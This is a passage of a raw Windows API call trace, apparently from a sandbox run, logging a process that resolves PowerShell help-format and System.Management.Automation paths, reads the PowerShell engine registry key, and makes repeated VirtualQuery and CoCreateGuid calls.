lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2fb9f70 | out: lpFileInformation=0x2fb9f70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0152.074] GetLastError () returned 0x0 [0152.074] SetErrorMode (uMode=0x1) returned 0x1 [0152.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0152.074] GetLastError () returned 0x0 [0152.074] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e6a8 | out: phkResult=0x12e6a8*=0x350) returned 0x0 [0152.074] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x0, lpcbData=0x12e6ec*=0x0 | out: lpType=0x12e6f0*=0x1, lpData=0x0, lpcbData=0x12e6ec*=0x56) returned 0x0 [0152.074] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x509ca8, lpcbData=0x12e6ec*=0x56 | out: lpType=0x12e6f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12e6ec*=0x56) returned 0x0 [0152.075] RegCloseKey (hKey=0x350) returned 0x0 [0152.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0152.075] GetLastError () returned 0x0 [0152.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e1e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0152.075] GetLastError () returned 0x0 [0152.128] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x2b3a579b, Data2=0xc2e8, Data3=0x4d92, Data4=([0]=0xa3, [1]=0x5, [2]=0xe7, [3]=0x5d, [4]=0xc0, [5]=0xa9, [6]=0x8a, [7]=0xbd))) returned 0x0 [0152.128] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xe1d1f24b, Data2=0x7d0, Data3=0x4b70, Data4=([0]=0x93, [1]=0xb9, [2]=0x6c, [3]=0xa0, [4]=0x40, [5]=0x32, [6]=0xc5, [7]=0x90))) returned 0x0 [0152.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.129] GetLastError () returned 0x0 [0152.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.129] GetLastError () returned 0x0 [0152.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.129] GetLastError () returned 0x0 [0152.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.129] GetLastError () returned 0x0 [0152.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.172] GetLastError () returned 0x0 [0152.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.173] GetLastError () returned 0x0 [0152.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.173] GetLastError () returned 0x0 [0152.173] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x9e2b3d7e, Data2=0xe423, Data3=0x4c52, Data4=([0]=0x9e, [1]=0xfc, [2]=0x66, [3]=0x98, [4]=0x3f, [5]=0x55, [6]=0x1, [7]=0xd6))) returned 0x0 [0152.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.173] GetLastError () returned 0x0 [0152.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.173] GetLastError () returned 0x0 [0152.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.173] GetLastError () returned 0x0 [0152.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.173] GetLastError () returned 0x0 [0152.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.173] GetLastError () returned 0x0 [0152.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.174] GetLastError () returned 0x0 [0152.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.174] GetLastError () returned 0x0 [0152.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.174] GetLastError () returned 0x0 [0152.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.174] GetLastError () returned 0x0 [0152.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.174] GetLastError () returned 0x0 [0152.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.174] GetLastError () returned 0x0 [0152.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.174] GetLastError () returned 0x0 [0152.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.174] GetLastError () returned 0x0 [0152.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.174] GetLastError () returned 0x0 [0152.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.174] GetLastError () returned 0x0 [0152.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.175] GetLastError () returned 0x0 [0152.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.175] GetLastError () returned 0x0 [0152.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.175] GetLastError () returned 0x0 [0152.176] VirtualQuery (in: lpAddress=0x12d064, lpBuffer=0x12e064, dwLength=0x1c | out: lpBuffer=0x12e064*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.176] VirtualQuery (in: lpAddress=0x12d0a0, lpBuffer=0x12e0a0, dwLength=0x1c | out: lpBuffer=0x12e0a0*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.177] GetLastError () returned 0x0 [0152.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.177] GetLastError () returned 0x0 [0152.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.177] GetLastError () returned 0x0 [0152.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.177] GetLastError () returned 0x0 [0152.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.177] GetLastError () returned 0x0 [0152.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.177] GetLastError () returned 0x0 [0152.177] VirtualQuery (in: lpAddress=0x12d3d0, lpBuffer=0x12e3d0, dwLength=0x1c | out: lpBuffer=0x12e3d0*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.177] GetLastError () returned 0x0 [0152.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.178] GetLastError () returned 0x0 [0152.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.178] GetLastError () returned 0x0 [0152.178] VirtualQuery (in: lpAddress=0x12d3d0, lpBuffer=0x12e3d0, dwLength=0x1c | out: lpBuffer=0x12e3d0*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.178] GetLastError () returned 0x0 [0152.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.178] GetLastError () returned 0x0 [0152.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.178] GetLastError () returned 0x0 [0152.178] VirtualQuery (in: lpAddress=0x12d3d0, lpBuffer=0x12e3d0, dwLength=0x1c | out: lpBuffer=0x12e3d0*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.178] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.179] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.180] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.180] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.180] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.180] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.180] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.180] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.181] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.181] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.182] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.182] VirtualQuery (in: lpAddress=0x12d20c, lpBuffer=0x12e20c, dwLength=0x1c | out: lpBuffer=0x12e20c*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.182] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.183] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.183] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.183] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.183] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xa607cf04, Data2=0x4b54, Data3=0x422f, Data4=([0]=0x82, [1]=0x5d, [2]=0x9f, [3]=0xcb, [4]=0xa8, [5]=0x5e, [6]=0x87, [7]=0x7))) returned 0x0 [0152.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.183] GetLastError () returned 0x0 [0152.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.184] GetLastError () returned 0x0 [0152.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.184] GetLastError () returned 0x0 [0152.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de28, lpFilePart=0x0 | out: 